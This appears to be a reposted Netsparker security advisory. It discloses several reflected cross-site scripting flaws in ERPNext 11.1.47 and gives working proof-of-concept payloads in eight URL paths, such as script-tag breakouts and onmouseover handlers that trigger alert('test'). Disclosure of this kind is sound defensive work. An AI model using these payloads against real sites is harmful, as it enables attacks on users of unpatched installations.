ERPNext 11.1.47 Cross Site Scripting

ERPNext version 11.1.47 suffers from multiple cross site scripting vulnerabilities.


MD5 | a83b987a7eb79280f2cb37e17bc23f0f

Information
--------------------

Advisory by Netsparker
Name: Multiple Reflected Cross-site Scripting Vulnerabilities in ERPNext
Affected Software: ERPNext
Affected Versions: 11.1.47
Vendor Homepage: https://erpnext.com/
Vulnerability Type: Reflected Cross-site Scripting
Severity: High
Status: Fixed
CVSS Score (3.0): CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
Netsparker Advisory Reference: NS-19-017

Technical Details
--------------------

URL: http://
{DOMAIN}/address/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>

URL: http://
{DOMAIN}/addresses/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>

URL: http://{DOMAIN}/blog/"onload="alert(‘test’)" x
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : "alert(‘test’)" x

URL: http://
{DOMAIN}/contact/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>

URL: http://
{DOMAIN}/project/'"--></style></scRipt><scRipt>alert(‘test’)</scRipt>
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : '"--></style></scRipt><scRipt>alert(‘test’)</scRipt>

URL: http://{DOMAIN}/user/[email protected]
"%20onmouseover=alert(‘test’)%20x="
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="

URL: http://{DOMAIN}/api/method/x"%20onmouseover=alert(‘test’)%20x="
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="

URL: http://{DOMAIN}/api/x"%20onmouseover=alert(‘test’)%20x="
Parameter Type : Full URL
Parameter Name : URI-BASED
Attack Pattern : x"%20onmouseover=alert(‘test’)%20x="

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-017-cross-site-scripting-in-erpnext/

Related Posts